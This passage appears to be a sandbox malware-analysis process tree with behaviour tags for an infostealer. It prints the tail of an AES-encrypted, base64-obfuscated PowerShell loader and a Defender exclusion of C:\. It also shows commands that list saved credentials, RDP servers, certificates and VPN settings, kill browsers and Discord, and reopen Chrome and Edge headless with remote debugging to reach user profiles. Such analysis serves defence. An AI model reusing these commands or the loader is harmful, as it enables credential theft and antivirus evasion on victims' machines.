H07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5360
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"6⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\cmd.exe"cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_4074842567.txt\""7⤵
- NTFS ADS
PID:1540
-
-
C:\Windows\system32\net.exe"net" statistics workstation7⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 statistics workstation8⤵PID:5320
-
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list7⤵PID:3664
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FO CSV /NH7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list7⤵PID:4692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list8⤵PID:2568
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\system32\certutil.exe"certutil" -store My7⤵PID:2112
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My7⤵PID:5892
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1920
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3056
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5192
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3664 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3940
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "7⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5336
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6016 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4556
-
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list7⤵PID:1552
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.747⤵PID:1624
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1588
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5576
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2528 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5436
-
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\system32\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6096
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5604
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM Discord.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5360
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordCanary.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5892
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe7⤵
- Suspicious use of AdjustPrivilegeToken
PID:5856
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordPTB.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordDevelopment.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5236
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5716
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe7⤵
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5948
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5500
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3728
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe7⤵
- Kills process with taskkill
PID:5780
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe7⤵
- Kills process with taskkill
PID:1184
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe7⤵PID:5576
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe7⤵
- Kills process with taskkill
PID:3780
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe7⤵
- Kills process with taskkill
PID:2260
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe7⤵
- Kills process with taskkill
PID:1540
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe7⤵
- Kills process with taskkill
PID:4508
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe7⤵PID:6040
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe7⤵
- Kills process with taskkill
PID:4156
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe7⤵PID:1612
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe7⤵
- Kills process with taskkill
PID:2412
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe7⤵
- Kills process with taskkill
PID:3856
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe7⤵
- Kills process with taskkill
PID:3036
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe7⤵PID:2112
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2780
-
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe7⤵
- Kills process with taskkill
PID:532 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5360
-
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe7⤵PID:4260
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1952
-
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe7⤵
- Kills process with taskkill
PID:2924
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe7⤵
- Kills process with taskkill
PID:3896
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"7⤵
- Enumerates processes with tasklist
PID:3820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41060 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1352 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd493cdcf8,0x7ffd493cdd04,0x7ffd493cdd108⤵PID:4492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2656,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2652 /prefetch:28⤵
- Modifies registry class
PID:5176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2000,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2516 /prefetch:38⤵PID:4872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2700,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2688 /prefetch:88⤵PID:4708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41060 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2924,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2920 /prefetch:18⤵
- Uses browser remote debugging
PID:3060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41060 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2996,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2988 /prefetch:18⤵
- Uses browser remote debugging
PID:5024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41060 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3964,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3916 /prefetch:18⤵
- Uses browser remote debugging
PID:3460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4468,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4460 /prefetch:88⤵PID:2160
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"7⤵
- Enumerates processes with tasklist
PID:3608
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe7⤵
- Kills process with taskkill
PID:4692
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"7⤵
- Enumerates processes with tasklist
PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=42816 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default7⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:1944 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x258,0x7ffd493af208,0x7ffd493af214,0x7ffd493af2208⤵PID:2160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2584,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:28⤵
- Modifies registry class
PID:5332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2836,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2828 /prefetch:38⤵PID:2756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2880,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2888 /prefetch:88⤵PID:4552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=42816 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3332,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3328 /prefetch:18⤵
- Uses browser remote debugging
PID:3628
-
-
